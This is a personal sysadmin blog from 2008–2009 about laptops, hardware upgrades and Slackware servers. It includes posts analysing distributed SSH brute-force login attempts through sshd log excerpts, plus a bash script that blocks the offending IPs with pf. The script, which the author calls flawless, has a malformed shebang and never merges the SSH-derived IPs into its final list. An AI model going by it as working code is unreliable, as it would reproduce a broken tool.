2009-04-14T10:55:00.003-04:00

Wouldn't it be nice if the laptop empire joined forces and standardized laptop power adapter cords? I've several laptop and each requires a dedicated cord. I forgot my cord for my Mini today...fortunately, it has a decent charge, but I now have to watch consumption of power. Good thing my Macbook is in my truck. May have to go get it!

Other news:

I'm still trying to script FW log parsing. I've pretty much nailed it for my BSD machine, but will need to edit what I have, as the script parses and adds IPs to a block list. Sometimes, I just want to parse and find the top 10 offenders. I also still need to do this on my Linux machines. I've a script that parses (for Linux) but it is very rudimentary. And, I still want to port the script to Perl or Python.

tcpdump, Dell Mini, and BASE

2009-03-10T18:29:00.004-04:00

So, I'm wondering why tcpdump is missing from the default install of my Dell's Ubuntu...doesn't make sense. I was having issues with getting my wifi card associated with my WAP and wanted to see the packets leaving the wireless interface, so I tried to bring up tcpdump, but it wasn't available. I actually had to hook a cat5 cable to the Mini to get this package, just to troubelshoot. I noticed the same thing with Suse about a year ago.

Apparently, tcpdump was created on the permissive free software license, per Wikipedia. I don't know if this is actually GPL or a derivative of GPL. The manpage doesn't mention what license tcpdump falls under and I'm sometimes wary of Wikipedia, as I like to find the facts on my own to validate (or invalidate) internet claims.

I'll research this and post my findings here.

On another note, I found a very cool bag for my Dell Mini, at Dell's website. I'll try to post pics and a link soon (from my Macbook, as the Mini's keyboard slows me down a bit).

Lastly, I somehow broke access to my MySQL database, so now my snort sensors won't report to it. It's been down for about 2 weeks and I don't have the time to fix it. I'm going on vacation for my birthday and hope to have some personal (ie, QUIET) time to myself to fix this. I'll be visiting my parents for my birthday this weekend and will see about shelling in to fix it remotely.

Worked on...

2009-03-03T23:17:00.003-05:00

Reconfigured mnwclient so that I can provide FW logs to MyNetworkWatchman (which is similar to Dshield).

I'd much rather get Dshield working on the Linode but for some reason, I been having difficulties using their supplied clients. I'll continue to work on it, as I had it working prior to the last Linode upgrade.

With that in mind, at some time I'm going to have to upgrade the Linode from v12.0 to v12.2.

Night...

What I've installed on the Mini so far...

2009-03-02T11:25:00.005-05:00

So far, I've installed the following on my Dell Mini:

tcpdump (IMO, this is a mandatory package...should've been installed by default)
xchat
gdesklets (I'm going to remove this because desktop space is at a premium)

That's it, so far. Surprisingly, I find myself not needing much more than what apps are already installed. Then again, I've had the Mini for less than a week. :)

EDIT: also installed 'locate' but the install didn't include the updatedb.conf file...working on that now.

My Mini is here!

2009-02-25T09:59:00.005-05:00

My Dell Mini has arrived. Went to pick it up at the local Fedex facility last night.

It came in a LITTLE box. Basically, it was just the netbook and the adapter that were in the box, with a few CDs and documents.

I took it out and plugged it up and the battery was almost fully charged already, but I charged it anyways.

The keypad is small and my big hands don't help much but the unit itself is pretty slick.

The tech specs are below:

32gb SSD drive
1.3mb vidcam
1gb RAM
Ubuntu Linux OS
Black in color

I opted for no bluetooth but now I'm thinking maybe I should've went that route (although it would've jacked up the price.

I now need a case. For now, I'm carrying it in my work laptop's bag.

My immediate problem is that it won't connect to any wireless networks, either at home or at work. I did a quick search and this appears to be a known issue. I'll have to delve more into this. When I attempt to have it automatically apply the wireless setting and check those settings, the settings are blank (no IP or DNS). Manually applying them doesn't help.

So, I'll be occupied the next few days... :)

Dell Mini 9 and system upgrades

2009-02-12T20:03:00.006-05:00

I just ordered a Dell Mini 9.

It should be here next week. I purchased the 16GB SSD upgrade and webcam. It is also a Windows XP model. Later, I'll more than likely either install Linux on it (or OS X), although this will require a USB optical drive.

The plan is to also upgrade the SSD to 32GB (a $119 purchase at My Digital Discount).

More than likely, I'm going to sell my Macbook (and maybe use the money to get an iMac).

As for my dead motherboard, it looks like I'm looking at this. I've decided to go AMD Phenom. Why? Because, while I want to upgrade to quad core while I can, I don't want to go Core i7 because I'd have to spend butt-loads on the CPU and motherboard in addition to DDR3 RAM...too much upgrading. At this point, I don't even want to go Intel. While Intel has better bang for the buck regarding CPU power and robustness, I'm extremely loyal to AMD. There's nothing wrong with AMD's products if you don't benchmark (and I'm not one to hang his every decision on raw stats alone). I should have the parts within a month...then I can game again. This will leave me with an unused Pentium D 830 (dual core), though. That means I'll more than likely buy a cheaper motherboard just to utilize that CPU in one of my older systems...it is a nice CPU with good power.

EDIT: I upgraded my Mini order because they were offering a $50 discount on Presidents Day. It will have Ubuntu and it will also have a 32GB SSD. More than likely I'm going to send it back, though, since Asus has a better buy, sans the SSD, but also has BT.

About my mainboard and CPU upgrade. I went AMD. I bought a Phenom 940 with a Foxconn mainboard. It is up and running now. It is FAST and I've yet to see all 4 cores maxed out! I also bought another mainboard for the Pentium CPU. That's a project for another day, though.

Foxconn A79A-S AM2+/AM2 AMD 790FX ATX AMD Motherboard

AMD Phenom II X4 940 Deneb 3.0GHz Socket AM2+ 125W Quad-Core Black Edition Processor Model HDZ940XCGIBOX

System dead

2009-01-30T09:20:00.009-05:00

Ref: http://slackfiles.blogspot.com/2007_02_18_archive.html

OK. Apparently when the Ultra PS died, it may have taken the motherboard with it. The machine has been blue-screening ever since the PS replacement, just not as frequently as before.

I also noticed that the HSF on the Northbridge isn't working. When searching Google for issues with the Northbridge, I found that this is happening to others and that it actually signifies a motherboard failure. The Northbridge gets HOT and I'm assuming that over time, the heat has killed the motherboard.

This is the time to upgrade, I guess. I'll more than likely buy a new motherboard/CPU combo and it'll more than likely be a quad-core CPU that I'll be getting (Phenom):

(Intel) http://www.newegg.com/Product/ComboDealDetails.aspx?ItemList=Combo.152153

or

(AMD) http://www.newegg.com/Product/ComboDealDetails.aspx?ItemList=Combo.150323

EDIT - I ended up purchasing a

Foxconn A79A-S AM2+/AM2 AMD 790FX ATX AMD Motherboard

and a

Retail AMD Phenom II X4 940 Deneb 3.0GHz 4 x 512KB L2 Cache CPU

and basically rebuilt this system...it is SMOKING. I was gaming and installing game patches for another game AND XP updates, and only two cores were being used while two were idle!! I put 3GB of RAM into the system (I almost put 4GB but then realized that XP 32-bit would only see 3GB of it...time for a 64-bit Windows OS install, I think). I really should install some high-grade RAM, though, as I think I only have 667mhz installed.

I also bought a

BIOSTAR TForce TP43D2A7 LGA 775 Intel P43 ATX Intel Motherboard

for to replace the motherboard for the Pentium-D CPU...I'll use this motherboard and CPU to rebuild my old Sempron 3000+ system (I'm starting to stack up 'older' motherboards and CPUs).

Recent Happenings

2009-01-07T23:25:00.004-05:00

I've added 2 more GB to my gaming system (the Ultra that I bought from TigerDirect 2 yrs ago). The system now has a total of 4GB. It runs Windows XP, so its only seeing 3.25GB of the installed 4GB, as I'm running XP 32-bit. I need to either go to Vista or install XP 64-bit. I may just wait until the new version of Windows desktop is released.

I've also begun to (again) monitor my internal LAN traffic at home. I broke down my security systems this past Fall because I bought a house and had to move. I wanted to reinstall my external IDS but didn't want to run an ethernet tap yet, so I used the same machine to just log internal traffic for now. Later, I'll have this machine start a separate Snort process that will monitor external traffic via the tap.

I need to upgrade my Slackware boxes to v12.2. The current boxes are running v12.0, including my Linode (http://wigglit.ath.cx). I'll try to do this soon, although this will require upgrading from v12.o to v12.1, then v12.1 to v12.2.

I'll also begin to attempt to convert all (which isn't many) my BASH scripts that manipulate text (FW log parsing scripts and such) to Perl. This is mainly as an exercise to force myself to learn Perl. I could also do Python. This is an educational 2009 goal for me. :)

Distributed SSH Brute Force Attempts, part 3

2008-12-29T23:09:00.001-05:00

I wanted to be able to harvest the log data that the brute force attempts are generating, so I've decided to not move the SSH listening port. I'm also logging each event within my firewall logs. The particular machine I'm seeing the attacks on is a FreeBSD box (I should've mentioned that earlier) and I'm using PF as the firewall of choice.

I'd like to show you my listing of blocked IPs. I've been actively gathering them since approximately 11/17/2008. I was unhappy that I hadn't noticed the distributed attempts until November and wanted more trending data, so I reached into my SSH logs and parsed the files present with a very dirty script that added each unique IP to a PF table that is designed to block such activity. The script is below:

[root@delly ~]# cat IPscript
#/bin/bash

cd /var/log
bunzip2 pflog.*

cat /var/log/auth.log | grep sshd | grep -i 'invalid user' > /tmp/auth_IP_list_1
bzcat /var/log/auth.log.[01234567].bz2 | grep sshd| grep -i 'invalid user' >> /tmp/auth_IP_list_1
sed '/Failed keyboard-interactive/d' /tmp/auth_IP_list_1 > /tmp/auth_IP_list_2
awk '{print $10}' /tmp/auth_IP_list_2 > /tmp/auth_IP_list_3

tcpdump -nettttr /var/log/pflog > /tmp/fw_IP_list_1
tcpdump -nettttr /var/log/pflog.0 >> /tmp/fw_IP_list_1
awk '{print $9}' /tmp/fw_IP_list_1 > /tmp/fw_IP_list_2
nawk -F. '{print $1, $2, $3, $4}' /tmp/fw_IP_list_2 > /tmp/fw_IP_list_3
sed 's/ /./g' /tmp/fw_IP_list_3 > /tmp/fw_IP_list_4

cat /tmp/fw_IP_list_4 >> /tmp/auth_IP_list_4
cat /tmp/auth_IP_list_4 | sort -rn | uniq > /tmp/auth_IP_list_5
cat /tmp/auth_IP_list_5 | grep -v '64.62.231.220' > /tmp/auth_IP_list_6
cat /tmp/auth_IP_list_6 | grep -v '66.160.141.30' > /tmp/auth_IP_list_7
cat /tmp/auth_IP_list_7 | grep -v '10.150.1' > /tmp/auth_IP_list_8
cat /tmp/auth_IP_list_8
cat /tmp/auth_IP_list_8 | wc -l

pfctl -t bruteforce -T add -f /tmp/auth_IP_list_8

rm -rf /tmp/fw_IP_list_* /tmp/auth_IP_list_*

I apologize for the lack of comments in the script...as I said, it was an extremely dirty hack that required me to learn a tad of sed and awk. The script outputs the following file: http://wigglit.ath.cx/txt/bruteforce_IPtable

My logs don't actually go back that far. The FW logs go back to 14 Dec. The SSH service logs go back to 26 Nov. I probably have captured IPs reaching back to the beginning of November, though.

My FW policy prevents anything from entering the network unless specifically allowed (default deny policy). The reason I wanted to track the IPs was because my Denyhosts configuration wasn't catching most of these and it was working fine before this new trend occurred. I'm a security consultant and a researcher at heart, so I thought that tracking this would be cool. My home router has ports 22, 443, and 3306 exposed to the wild for the FreeBSD box. The FW only allows certain IPs in on those ports, though, so nothing will get in. The activity that doesn't get immediately blocked is blocked by the bruteforce_IPtable script that I run daily. The script is flawless and I will begin to have it run hourly via a cronjob. I'll also have it send an updated list to my website daily.

The IPs within my block table number 565. The script parsed 115 from the logs tonight, but only added 1 IP. The norm is usually 2-3 daily. The rest of the IPs are from logs over the last month and a half.

Oh yeah, I've another script does a daily copy of the IPs that are added to the table, so I can at least quickly determine (using 'diff') what was added on a certain day. I can create a script that will show me what was added daily for a given timespan (day/week/month).

Distributed SSH Brute Force Attempts, part 2

2008-11-24T22:10:00.001-05:00

OK, so I'm still curious about the distributed SSH brute force attempts I've been seeing.

I wanted to check all my logs and not just the most recent logfile. Looking at my /var/log directory:

-su-2.05b# ls | grep auth
auth.log
auth.log.0.bz2
auth.log.1.bz2
auth.log.2.bz2
auth.log.3.bz2
auth.log.4.bz2
auth.log.5.bz2
auth.log.6.bz2
auth.log.7.bz2

I tailed the auth.log file and grabbed a random IP:

Nov 24 21:53:59 delly sshd[75490]: Invalid user bryan from 170.56.255.20
Nov 24 21:54:00 delly sshd[75490]: error: PAM: authentication error for illegal user bryan from 170.56.255.20
Nov 24 21:54:00 delly sshd[75490]: Failed keyboard-interactive/pam for invalid user bryan from 170.56.255.20 port 43229 ssh2

I then wanted to check all the auth.log.* files, but was curious as to how I could check compressed files. I found that there's a command called bzgrep that allows one to grep compressed files, so I used the following command and came up with quite a few hits for the referenced IP over seven (7) log files:

-su-2.05b# bzgrep '170.56.255.20' auth.log.*

The results show 2-3 instances of log entries per login attempt, so I wanted to isolate each instance without having to use arcane sed and sort commands, so I used the following:

-su-2.05b# bzgrep '170.56.255.20' auth.log.* | grep 'Invalid user' | wc -l
19

So, this particular IP generated 19 log entries between 22 and 24 Nov.

That's not particularly good. I'd love to create a script that would break down all of these IPs' unique login attempts (and possibly block them). Sounds like a project, no? :)

I've a bit of time, so I did the following (non-scripted). I cat'd the auth.log file and collected a screens-worth of data:

-su-2.05b# cat auth.log | less
Nov 24 15:00:00 delly newsyslog[74001]: logfile turned over due to size>100K
Nov 24 15:00:49 delly sshd[74014]: Invalid user brand from 218.80.215.198
Nov 24 15:00:50 delly sshd[74014]: error: PAM: authentication error for illegal user brand from 218.80.215.198
Nov 24 15:00:50 delly sshd[74014]: Failed keyboard-interactive/pam for invalid user brand from 218.80.215.198 port 19051 ssh2
Nov 24 15:02:25 delly sshd[74017]: Invalid user brandee from 83.19.224.11
Nov 24 15:02:26 delly sshd[74017]: error: PAM: authentication error for illegal user brandee from dum11.internetdsl.tpnet.pl
Nov 24 15:02:26 delly sshd[74017]: Failed keyboard-interactive/pam for invalid user brandee from 83.19.224.11 port 50163 ssh2
Nov 24 15:03:48 delly sshd[74020]: Invalid user brandee from 194.224.118.61
Nov 24 15:03:48 delly sshd[74020]: error: PAM: authentication error for illegal user brandee from 194.224.118.61
Nov 24 15:03:48 delly sshd[74020]: Failed keyboard-interactive/pam for invalid user brandee from 194.224.118.61 port 6345 ssh2
Nov 24 15:05:21 delly sshd[74026]: Invalid user brandee from 90.176.233.222
Nov 24 15:05:22 delly sshd[74026]: error: PAM: authentication error for illegal user brandee from 222.233.broadband9.iol.cz
Nov 24 15:05:22 delly sshd[74026]: Failed keyboard-interactive/pam for invalid user brandee from 90.176.233.222 port 46108 ssh2
Nov 24 15:06:42 delly sshd[74029]: Invalid user branden from 125.77.106.246
Nov 24 15:06:42 delly sshd[74029]: error: PAM: authentication error for illegal user branden from 125.77.106.246
Nov 24 15:06:42 delly sshd[74029]: Failed keyboard-interactive/pam for invalid user branden from 125.77.106.246 port 46495 ssh2
Nov 24 15:10:59 delly sshd[74035]: Invalid user brandi from 122.224.128.222
Nov 24 15:10:59 delly sshd[74035]: error: PAM: authentication error for illegal user brandi from 122.224.128.222
Nov 24 15:10:59 delly sshd[74035]: Failed keyboard-interactive/pam for invalid user brandi from 122.224.128.222 port 42253 ssh2
Nov 24 15:12:27 delly sshd[74051]: Invalid user brandi from 59.125.200.51
Nov 24 15:12:28 delly sshd[74051]: error: PAM: authentication error for illegal user brandi from 3w.upcc.com.tw
Nov 24 15:12:28 delly sshd[74051]: Failed keyboard-interactive/pam for invalid user brandi from 59.125.200.51 port 14046 ssh2
Nov 24 15:15:23 delly sshd[74057]: Invalid user brandice from 62.112.222.88
Nov 24 15:15:24 delly sshd[74057]: error: PAM: authentication error for illegal user brandice from 3e70de58.adsl.enternet.hu
Nov 24 15:15:24 delly sshd[74057]: Failed keyboard-interactive/pam for invalid user brandice from 62.112.222.88 port 42127 ssh2
Nov 24 15:16:49 delly sshd[74060]: Invalid user brandice from 218.80.215.198
Nov 24 15:16:50 delly sshd[74060]: error: PAM: authentication error for illegal user brandice from 218.80.215.198
Nov 24 15:16:50 delly sshd[74060]: Failed keyboard-interactive/pam for invalid user brandice from 218.80.215.198 port 57929 ssh2
Nov 24 15:18:11 delly sshd[74063]: Invalid user brandice from 65.203.231.41
Nov 24 15:18:11 delly sshd[74063]: error: PAM: authentication error for illegal user brandice from 65.203.231.41
Nov 24 15:18:11 delly sshd[74063]: Failed keyboard-interactive/pam for invalid user brandice from 65.203.231.41 port 38395 ssh2
Nov 24 15:19:43 delly sshd[74066]: Invalid user brandie from 123.14.10.64
Nov 24 15:19:44 delly sshd[74066]: error: PAM: authentication error for illegal user brandie from 123.14.10.64
Nov 24 15:19:44 delly sshd[74066]: Failed keyboard-interactive/pam for invalid user brandie from 123.14.10.64 port 4925 ssh2
Nov 24 15:21:07 delly sshd[74072]: Invalid user brandie from 200.170.141.134
Nov 24 15:21:07 delly sshd[74072]: error: PAM: authentication error for illegal user brandie from 200-170-141-134.static.ctbctelecom.com.br
Nov 24 15:21:07 delly sshd[74072]: Failed keyboard-interactive/pam for invalid user brandie from 200.170.141.134 port 39979 ssh2
Nov 24 15:22:44 delly sshd[74088]: Invalid user brandie from 80.51.31.84
Nov 24 15:22:44 delly sshd[74088]: error: PAM: authentication error for illegal user brandie from 80.51.31.84
Nov 24 15:22:44 delly sshd[74088]: Failed keyboard-interactive/pam for invalid user brandie from 80.51.31.84 port 39453 ssh2
Nov 24 15:24:02 delly sshd[74091]: Invalid user brandon from 200.157.176.13
Nov 24 15:24:03 delly sshd[74091]: error: PAM: authentication error for illegal user brandon from 200.157.176.13
Nov 24 15:24:03 delly sshd[74091]: Failed keyboard-interactive/pam for invalid user brandon from 200.157.176.13 port 54638 ssh2

I then checked every IP for unique log entries within all of my ssh logs:

-su-2.05b# bzgrep '218.80.215.198' auth.log.* | grep 'Invalid user' | wc -l
6

-su-2.05b# bzgrep '218.80.215.198' auth.log.* | grep 'Invalid user'
auth.log.0.bz2:Nov 24 10:55:25 delly sshd[73084]: Invalid user bjorn from 218.80.215.198
auth.log.1.bz2:Nov 23 23:22:28 delly sshd[70023]: Invalid user bahari from 218.80.215.198
auth.log.3.bz2:Nov 23 11:18:54 delly sshd[66908]: Invalid user archibald from 218.80.215.198
auth.log.4.bz2:Nov 23 04:11:52 delly sshd[65051]: Invalid user amy from 218.80.215.198
auth.log.5.bz2:Nov 22 23:20:53 delly sshd[63465]: Invalid user alize from 218.80.215.198
auth.log.7.bz2:Nov 22 01:07:10 delly sshd[57652]: Invalid user claire from 218.80.215.198

-su-2.05b# bzgrep '83.19.224.11' auth.log.* | grep 'Invalid user' | wc -l
8
-su-2.05b# bzgrep '194.224.118.61' auth.log.* | grep 'Invalid user' | wc -l
11
-su-2.05b# bzgrep '90.176.233.222' auth.log.* | grep 'Invalid user' | wc -l
0
-su-2.05b# bzgrep '125.77.106.246' auth.log.* | grep 'Invalid user' | wc -l
9
-su-2.05b# bzgrep '122.224.128.222' auth.log.* | grep 'Invalid user' | wc -l
8
-su-2.05b# bzgrep '59.125.200.51' auth.log.* | grep 'Invalid user' | wc -l
5
-su-2.05b# bzgrep '62.112.222.88' auth.log.* | grep 'Invalid user' | wc -l
10
-su-2.05b# bzgrep '218.80.215.198' auth.log.* | grep 'Invalid user' | wc -l
6
-su-2.05b# bzgrep '65.203.231.41' auth.log.* | grep 'Invalid user' | wc -l
15

-su-2.05b# bzgrep '65.203.231.41' auth.log.* | grep 'Invalid user'
auth.log.0.bz2:Nov 24 14:56:28 delly sshd[73982]: Invalid user bran from 65.203.231.41
auth.log.1.bz2:Nov 23 22:32:01 delly sshd[69793]: Invalid user azra from 65.203.231.41
auth.log.1.bz2:Nov 24 02:04:43 delly sshd[70680]: Invalid user bartholemew from 65.203.231.41
auth.log.1.bz2:Nov 24 04:07:45 delly sshd[71474]: Invalid user beck from 65.203.231.41
auth.log.2.bz2:Nov 23 19:02:03 delly sshd[68866]: Invalid user aurora from 65.203.231.41
auth.log.2.bz2:Nov 23 20:16:18 delly sshd[69213]: Invalid user avi from 65.203.231.41
auth.log.3.bz2:Nov 23 10:08:33 delly sshd[66592]: Invalid user april from 65.203.231.41
auth.log.3.bz2:Nov 23 10:24:43 delly sshd[66657]: Invalid user aquila from 65.203.231.41
auth.log.3.bz2:Nov 23 11:22:12 delly sshd[66933]: Invalid user archie from 65.203.231.41
auth.log.4.bz2:Nov 23 04:22:52 delly sshd[65094]: Invalid user anahid from 65.203.231.41
auth.log.4.bz2:Nov 23 05:32:46 delly sshd[65407]: Invalid user andra from 65.203.231.41
auth.log.5.bz2:Nov 22 23:00:09 delly sshd[63393]: Invalid user alisha from 65.203.231.41
auth.log.6.bz2:Nov 22 12:41:17 delly sshd[60534]: Invalid user abraham from 65.203.231.41
auth.log.6.bz2:Nov 22 16:14:07 delly sshd[61564]: Invalid user africa from 65.203.231.41
auth.log.7.bz2:Nov 22 11:48:33 delly sshd[60289]: Invalid user aaralyn from 65.203.231.41

-su-2.05b# bzgrep '123.14.10.64' auth.log.* | grep 'Invalid user' | wc -l
19
-su-2.05b# bzgrep '200.170.141.134' auth.log.* | grep 'Invalid user' | wc -l
6
-su-2.05b# bzgrep '80.51.31.84' auth.log.* | grep 'Invalid user' | wc -l
3
-su-2.05b# bzgrep '200.157.176.13' auth.log.* | grep 'Invalid user' | wc -l
4

So, someone appears to have a pool of compromised machines and is using each one in a scaled SSH brute force attack, based on the referenced user accounts being bruteforced. I'm seeing more of this than standard, blatant SSH BF attempts. I'll be checking Denyhosts' website to see if they've a resolution on how to track and ban such activity.

Distributed SSH Brute Force Attempts?

2008-11-23T15:48:00.001-05:00

I'd read not long ago on the ISC Diary that someone has noticed that a there's a newly discovered way to avoid automated tools such as Denyhosts and Fail2ban. It appears that the attacks are now distributed across an IP pool of compromised machines. Maybe botnet masters are leveraging their botnets to attempt to bruteforce login attempts without risking the attacking hosts.

I think I'm seeing this in my home firewall logs:

Nov 23 15:23:01 delly sshd[67946]: error: PAM: authentication error for illegal user artois from 1-1-4-27a.vhe.sth.bostream.se
Nov 23 15:23:01 delly sshd[67946]: Failed keyboard-interactive/pam for invalid user artois from 82.182.188.187 port 35763 ssh2
Nov 23 15:24:18 delly sshd[67949]: Invalid user arty from 58.26.48.162
Nov 23 15:24:18 delly sshd[67949]: error: PAM: authentication error for illegal user arty from 58.26.48.162
Nov 23 15:24:18 delly sshd[67949]: Failed keyboard-interactive/pam for invalid user arty from 58.26.48.162 port 5785 ssh2
Nov 23 15:25:17 delly sshd[67955]: Invalid user arty from 200.170.141.134
Nov 23 15:25:17 delly sshd[67955]: error: PAM: authentication error for illegal user arty from 200-170-141-134.static.ctbctelecom.com.br
Nov 23 15:25:17 delly sshd[67955]: Failed keyboard-interactive/pam for invalid user arty from 200.170.141.134 port 57360 ssh2
Nov 23 15:26:31 delly sshd[67958]: Invalid user arty from 219.76.222.27
Nov 23 15:26:31 delly sshd[67958]: error: PAM: authentication error for illegal user arty from n219076222027.netvigator.com
Nov 23 15:26:31 delly sshd[67958]: Failed keyboard-interactive/pam for invalid user arty from 219.76.222.27 port 47176 ssh2
Nov 23 15:28:48 delly sshd[67963]: Invalid user arva from 58.196.4.2
Nov 23 15:28:49 delly sshd[67963]: error: PAM: authentication error for illegal user arva from 58.196.4.2
Nov 23 15:28:49 delly sshd[67963]: Failed keyboard-interactive/pam for invalid user arva from 58.196.4.2 port 50637 ssh2
Nov 23 15:33:27 delly sshd[67982]: Invalid user arvid from 125.77.106.246
Nov 23 15:33:27 delly sshd[67982]: error: PAM: authentication error for illegal user arvid from 125.77.106.246
Nov 23 15:33:27 delly sshd[67982]: Failed keyboard-interactive/pam for invalid user arvid from 125.77.106.246 port 51673 ssh2
Nov 23 15:34:40 delly sshd[67985]: Invalid user arvin from 85.39.252.226
Nov 23 15:34:40 delly sshd[67985]: error: PAM: authentication error for illegal user arvin from host226-252-static.39-85-b.business.telecomitalia.it
Nov 23 15:34:40 delly sshd[67985]: Failed keyboard-interactive/pam for invalid user arvin from 85.39.252.226 port 43706 ssh2
Nov 23 15:35:54 delly sshd[67991]: Invalid user arvin from 217.126.90.161
Nov 23 15:35:55 delly sshd[67991]: error: PAM: authentication error for illegal user arvin from 161.red-217-126-90.staticip.rima-tde.net
Nov 23 15:35:55 delly sshd[67991]: Failed keyboard-interactive/pam for invalid user arvin from 217.126.90.161 port 36755 ssh2
Nov 23 15:37:11 delly sshd[67994]: Invalid user arvin from 200.232.181.40
Nov 23 15:37:11 delly sshd[67994]: error: PAM: authentication error for illegal user arvin from 200-232-181-40.dsl.telesp.net.br
Nov 23 15:37:11 delly sshd[67994]: Failed keyboard-interactive/pam for invalid user arvin from 200.232.181.40 port 56318 ssh2
Nov 23 15:39:16 delly sshd[67997]: Invalid user arwan from 200.248.82.130
Nov 23 15:39:17 delly sshd[67997]: error: PAM: authentication error for illegal user arwan from 200.248.82.130
Nov 23 15:39:17 delly sshd[67997]: Failed keyboard-interactive/pam for invalid user arwan from 200.248.82.130 port 53388 ssh2
Nov 23 15:40:24 delly sshd[68003]: Invalid user arwan from 217.126.90.161
Nov 23 15:40:25 delly sshd[68003]: error: PAM: authentication error for illegal user arwan from 161.red-217-126-90.staticip.rima-tde.net
Nov 23 15:40:25 delly sshd[68003]: Failed keyboard-interactive/pam for invalid user arwan from 217.126.90.161 port 43871 ssh2
Nov 23 15:41:33 delly sshd[68006]: Invalid user arwen from 200.209.6.130
Nov 23 15:41:34 delly sshd[68006]: error: PAM: authentication error for illegal user arwen from 200.209.6.130
Nov 23 15:41:34 delly sshd[68006]: Failed keyboard-interactive/pam for invalid user arwen from 200.209.6.130 port 14808 ssh2
Nov 23 15:42:48 delly sshd[68016]: Invalid user arwen from 123.14.10.64
Nov 23 15:42:49 delly sshd[68016]: error: PAM: authentication error for illegal user arwen from 123.14.10.64
Nov 23 15:42:49 delly sshd[68016]: Failed keyboard-interactive/pam for invalid user arwen from 123.14.10.64 port 7600 ssh2
Nov 23 15:43:50 delly sshd[68020]: reverse mapping checking getaddrinfo for techregister.worcesteracademy.org [68.112.227.30] failed - POSSIBLE BREAK-IN ATTEMPT!
Nov 23 15:43:50 delly sshd[68020]: Invalid user arwen from 68.112.227.30
Nov 23 15:43:50 delly sshd[68020]: error: PAM: authentication error for illegal user arwen from 68.112.227.30
Nov 23 15:43:50 delly sshd[68020]: Failed keyboard-interactive/pam for invalid user arwen from 68.112.227.30 port 38273 ssh2
Nov 23 15:45:03 delly sshd[68039]: Invalid user arya from 196.28.50.162
Nov 23 15:45:03 delly sshd[68039]: error: PAM: authentication error for illegal user arya from www.cfse.gov.pr
Nov 23 15:45:03 delly sshd[68039]: Failed keyboard-interactive/pam for invalid user arya from 196.28.50.162 port 55647 ssh2
Nov 23 15:46:10 delly sshd[68042]: Invalid user arya from 81.12.221.74
Nov 23 15:46:10 delly sshd[68042]: error: PAM: authentication error for illegal user arya from em.asiban.ro
Nov 23 15:46:10 delly sshd[68042]: Failed keyboard-interactive/pam for invalid user arya from 81.12.221.74 port 16653 ssh2
Nov 23 15:47:23 delly sshd[68050]: Invalid user arya from 190.34.148.178
Nov 23 15:47:23 delly sshd[68050]: error: PAM: authentication error for illegal user arya from 190.34.148.178
Nov 23 15:47:23 delly sshd[68050]: Failed keyboard-interactive/pam for invalid user arya from 190.34.148.178 port 58738 ssh2
Nov 23 15:48:29 delly sshd[68053]: reverse mapping checking getaddrinfo for britannic-iss-medidean-working.e1-4-0-0-57.0.ar2.lon3.gblx.net [64.213.54.106] failed - POSSIBLE BREAK-IN ATTEMPT!
Nov 23 15:48:29 delly sshd[68053]: Invalid user asa from 64.213.54.106
Nov 23 15:48:29 delly sshd[68053]: error: PAM: authentication error for illegal user asa from 64.213.54.106
Nov 23 15:48:29 delly sshd[68053]: Failed keyboard-interactive/pam for invalid user asa from 64.213.54.106 port 42991 ssh2
Nov 23 15:49:46 delly sshd[68056]: Invalid user asa from 91.135.200.86
Nov 23 15:49:47 delly sshd[68056]: error: PAM: authentication error for illegal user asa from 91.135.200.86
Nov 23 15:49:47 delly sshd[68056]: Failed keyboard-interactive/pam for invalid user asa from 91.135.200.86 port 10262 ssh2
Nov 23 15:50:52 delly sshd[68062]: Invalid user asa from 200.20.187.222
Nov 23 15:50:53 delly sshd[68062]: error: PAM: authentication error for illegal user asa from 200.20.187.222
Nov 23 15:50:53 delly sshd[68062]: Failed keyboard-interactive/pam for invalid user asa from 200.20.187.222 port 52959 ssh2

Don't focus on the attacking IPs, but look at the referenced users. There are now tools that look like they're scaling attacks on a listing of common logins (or maybe even dictionary attacks) so that there's less risk of detection. There are current tools that look for attacks in a thresholded manner (example: 4 attacks in 5 sec warrants a block of that attacking IP). This new method of attack will not trigger the thresholding blocks.

More than ever, SSH key-based authentication should be used. This will prevent a successful login when under attack via brute forcing methods.

I can already see attack detection tools being adjusted to focus on tracking user accounts being bruteforced and banning all IPs that try to access user accounts based on time (example: 4 attacks on account asa in 5 sec will warrant a ban of all subsequent IPs for the next day or so...and not block if the IP is listed within a whitelist).

Your thoughts?

Asus ships software cracker on recovery DVD

2008-09-23T14:19:00.001-04:00

Asus ships software cracker on recovery DVD:

Asus is accidentally shipping software crackers and confidential documents on the recovery DVDs that come with its laptops.

The startling discovery was made by a PC Pro reader whose antivirus software was triggered by a key cracker for the WinRAR compression software, which was located on the recovery DVD for his Asus laptop.

Script that parses FW logs?

2008-07-08T23:04:00.001-04:00

What I'm trying to do now is create a script that will parse FW logs daily and break down how many entries each IP generated.

I want to do this first as a quick command, then leverage BASH scripting to automate this.

What I used in http://slackfiles.blogspot.com/2007/12/modsecurity-again.html apparently isn't working when trying to parse the firewall logs. I don't get it, but then again, I'm tired. I'll try again tomorrow.

The new logs look like the below (showing in /var/log/syslog instead of /var/log/messages of my old setup):

Jul 8 22:55:19 starchild kernel: BLOCKED: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:fc:8b:59:08:00 SRC=64.47.32.59 DST=64.62.231.220 LEN=48 TOS=0x00 PREC=0x00 TTL=249 ID=39747 DF PROTO=TCP SPT=3405 DPT=445 WINDOW=16384 RES=0x00 SYN URGP=0

I may need to leverage Awk (I was close to doing this before I upgraded the server from v9.0 to v12.0).

Stay tuned!

Linode has been upgraded to Slackware v12.0

2008-06-22T22:56:00.001-04:00

I decided to take the plunge and upgrade my Linode server from v9.0 to v12.0.

Things are semi-normal, yet I still have some things to do, such as reinstall denyhosts, a new iptables script, mnwclient, and dshieldclient.

So far, I've reinstalled the eggdrop bot (slackboy), using the latest version of the software. I've also reinstalled Apache, using v2.0.63. Snort is running on the system (installed using my v12.0 slackpack), and also Webmin (which eases my pain somewhat, especially when administrating from work...they frown upon using SSH outbound).

This verion of Slackware is barebones and I've had to manually install the following packages so far:

-rw-r--r-- 1 root root 122953 2006-11-01 02:50 checkinstall-1.6.1-i386-1.tgz
-rw-r--r-- 1 root root 551952 2006-05-27 16:24 cyrus-sasl-2.1.22-i486-1.tgz
-rw-r--r-- 1 root root 744871 2007-05-09 14:46 fetchmail-6.3.8-i486-2.tgz
-rw-r--r-- 1 root root 2268306 2006-03-26 19:04 groff-1.19.2-i486-1.tgz
